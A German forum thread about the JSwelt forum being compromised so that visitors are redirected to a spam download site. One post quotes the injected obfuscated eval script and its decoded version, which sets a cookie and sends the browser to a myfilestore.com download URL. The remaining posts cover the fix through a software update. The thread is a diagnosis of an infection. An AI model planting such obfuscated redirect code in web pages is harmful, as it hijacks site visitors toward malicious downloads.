Forum falsch verlinkt?

[mikdoe]

Was mir tierisch auf den Zeiger geht:

Gebt mal bei Google die Begriffe "js forum" ein.
Erstes Suchergebnis angeblich Javascript-Forum JSwelt (Javascript, PHP, MySQL, AJAX, Webdesign)
forum.jswelt.de/
Klickt mal drauf und ihr landet auf so einer Megaspamschleuder myfilestore .com
Kann man aber nur mit einem anderen Browser nachstellen, der kein Forencookie gesetzt hat.

Können die Betreiber dieses Forums das beeinflussen und abstellen?
Wäre super

 

[kkapsner]

Das hat nichts mit Google zu tun, sondern damit, dass das Forum infiziert hat.

Wenn der Browser noch nicht falsch geleitet wurde, wird einmal folgender Code ausgegeben:

<html><head></head><body><script type="text/javascript">var vbsp='DDBB4C38';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</script></body></html>

Decodiert wird damit dieser Code ausgeführt (aufgehübscht und Variablennamen ausgetauscht):

function ipbcc(name, value) {
    var date = new Date();
    date['setTime'](date['getTime']() + 86400000);
    var expires = '; expires=' + date['toGMTString']();
    document['cookie'] = name + '=' + value + expires + '; path=/'
};
ipbcc('vbsp', '1');
document['location'] = 'http://myfilestore.com/download.php?id=' + vbsp;

@mo: bitte schau' wo das her kommt!

 

[mo]

hi,
bin eben dabei, nach ner lösung zu suchen. gar nicht so einfach, wie ich feststellen muss. ich werde vermutlich mal ein update auf die neueste foren-software machen.

 

[mo]

http://forumtest.jswelt.de/
bitte mal testen..

 

[mikdoe]

bitte mal testen..

Abos sind da, Anmeldung klappt, nervige Werbung ist da.
Sieht gut aus was ich beurteilen kann.

 

[ein schlauer]

Ausser dass immer noch die Fehlerkonsole mit vielen unnötigen CSS Fehlerm geflutet wird, funktioniert anscheinend alles.

 

[mo]

okay. gut.
@werbung: sprich da nochmal drauf an, ich werde mal sehen, dass ich für user ab 1000 beiträgen die werbung dann abschalte.

 

[mikdoe]

@werbung: sprich da nochmal drauf an, ich werde mal sehen, dass ich für user ab 1000 beiträgen die werbung dann abschalte.

Das könnte dazu führen, dass fleißig gespamt wird, um die Werbung weg zu haben.
Eine Einblendung bei jedem zweiten oder dritten Aufruf für registrierte User fände ich einen besseren Kompromiss.

 

[mo]

bei 1000 beiträgen muss einer schon viel spammen, denk ich. und reine spambeiträge können wir ja löschen.

 

[dkdenz]

Ich brauch ja nicht mehr spammen ...

 

[mo]

+1

 

[kkapsner]

Scheint auf den ersten Blick zu funktionieren. Die Infektion scheint auch nicht mehr da zu sein...

PS: hätte auch schon genug gespamt...

EDIT: das sind aber jetzt zwei getrennte Datenbanken, oder? Denn die Beiträge von heute erscheinen da nicht.

 

[mikdoe]

EDIT: das sind aber jetzt zwei getrennte Datenbanken, oder? Denn die Beiträge von heute erscheinen da nicht.

Er wird gestern eine Kopie angelegt haben, um das Update zu simulieren.

 

[mo]

genau, ich hab ein duplikat erstellt, da doch einige tiefgreifende db-änderungen notwendig waren.
jetzt stellt sich noch die frage nach dem style für das board..
was haltet ihr von dem gedanken, den standard-vB-style zu nehmen und lediglich das logo zu tauschen?

 

[dkdenz]

Überrasche uns, mo ...

 

[kkapsner]

Ich hätte gerne ein Design, das keine CSS-Fehler wirft... der Rest ist mir eigentlich egal.

 

[mo]

sodala, ich habe eben mal ein update gefahren. wie schaut´s aus, probleme behoben?
shoutbox und anderen kram werde ich noch nachinstallieren, wobei sich ja durchaus die frage stellt, ob die entsprechend genutzt wird..

 

[dkdenz]

Gute Arbeit, mo ...
Wegen mir kann die Shoutbox wegbleiben.

 

[mikdoe]

Mit Google klappt!

Hatte gestern und heute bis zum Update mehrere Warnungen in Avira wg. infizierten Dateien im Cache Ordner. Die hatte ich bei diesem Forum sonst nie. Halte ich mal im Auge.
Sieht ansonsten super aus was ich bisher sehe.

 

[mo]

besten dank für´s feedback! gut, dass alles läuft. kam nur nicht eher zum fixen, bin parallel am umziehen. also nicht das forum, sondern den mo himself.